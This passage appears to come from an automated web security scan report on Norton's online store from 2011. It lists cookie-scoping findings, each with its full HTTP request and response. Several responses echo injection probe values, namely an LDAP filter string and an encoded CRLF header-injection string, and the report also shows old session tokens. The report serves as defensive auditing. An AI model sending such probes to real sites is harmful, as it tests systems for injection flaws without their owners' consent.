Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 50623

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.8. http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:58 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 68924

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.9. http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:02 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 73974

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.10. http://buy.norton.com/estore/mf/upgradeCenter previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/upgradeCenter

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/upgradeCenter HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:30 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 137137

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.11. http://buy.norton.com/estore/mf/upgradeRenewal previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/upgradeRenewal

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; BIGipServerbuy1_prd_SSL=4046749583.16671.0000; symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; AKNORT=0; mbox=check#true#1315621970|session#1315621887128-280442#1315623770|PC#1315621887128-280442.19#1316831510|profile#+_COUNTRY-US+_LANGUAGE-en+_TRAFFIC_SOURCE-trf_id%3Asymcom+_PGM_TYPE-UNKNOWN+_SUBCHANNEL-Online%20%281st%29+_ORIG_SUB-Online%20%281st%29#1380421910; s_eVar63=%5B%5B'store%253Atrf_id%253Asymcom'%2C'1315621909811'%5D%5D; s_eVar65=%5B%5B'store%253Aonline%2520%25281st%2529'%2C'1315621909812'%5D%5D; s_cc=true; s_nr=1315621909816-New; event69=event69; s_eVar70=%5B%5B'23440%253A0%253A0%252C'%2C'1315621909824'%5D%5D; s_sq=%5B%5BB%5D%5D; COUNTRY=US; LANGUAGE=EN; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; LASTTIME_CV_DATE=Sep-09-2011 14:31:20; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:22 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 58568
Connection: Keep-Alive

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=6096FB79-2899-3CBF-0291-6529FB9376B7; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:20 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=6096FB79-2899-3CBF-0291-6529FB9376B7; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 41047

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.13. http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=6BFF5F18-81A0-7426-AE16-067CCC63D696; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/
sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:17 GMT
Pragma: no-cache
Location: http://buy.norton.com/estore/mf/errorProductNotFound
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=6BFF5F18-81A0-7426-AE16-067CCC63D696; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/
Set-Cookie: sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/
Content-Language: de-CH
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 299

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/er
...[SNIP]...

9.14. http://mbox3.offermatica.com/m2/verisign/mbox/standard previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://mbox3.offermatica.com
Path:	/m2/verisign/mbox/standard

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mboxSession=1315621455064-973488; Domain=offermatica.com; Expires=Fri, 09-Sep-2011 21:56:52 GMT; Path=/m2/verisign

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621580604-481541&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_TS_Main&mboxId=0&mboxURL=http%3A//www.verisign.com/trust-seal/index.html%3Ftid%3Dgnps&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 302 Moved Temporarily
Server: Test & Target
P3P: CP="NOI DSP CURa OUR STP COM"
Date: Fri, 09 Sep 2011 21:25:51 GMT
Location: http://mbox3.offermatica.com/m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621580604-481541&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_TS_Main&mboxId=0&mboxURL=http%3A//www.verisign.com/trust-seal/index.html%3Ftid%3Dgnps&mboxReferrer=&mboxVersion=31&mboxXDomainCheck=true
Set-Cookie: mboxSession=1315621455064-973488; Domain=offermatica.com; Expires=Fri, 09-Sep-2011 21:56:52 GMT; Path=/m2/verisign
Content-Length: 0

9.15. http://buy.norton.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?trf_id=symcom&inid=us_hho_errorpage_to_store HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1315621948|session#1315621887128-280442#1315623748|PC#1315621887128-280442.19#1316831490; s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:16 GMT
Location: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=f7d3c8fa-e003-4390-a682-049bba2b3c7d1315603876608
Set-Cookie: COUNTRY=US; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=en; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 413

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/la
...[SNIP]...

9.16. http://buy.norton.com/ps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/ps

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:37:23; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ps HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:23 GMT
Location: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=18a29e71-5447-4147-9046-865f8a1fce521315604243554
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:23; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 413

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/la
...[SNIP]...

9.17. http://buy.norton.com/special-promotions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/special-promotions

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /special-promotions HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:25 GMT
Location: http://buy.norton.com/estore/mf/landingPromotion?rdid=4d1e0611-4d59-4d29-9f22-ad1cbf72a98d1315604245447
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 401

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/la
...[SNIP]...

9.18. http://buy.norton.com/support previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/support

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

COUNTRY=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LANGUAGE=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
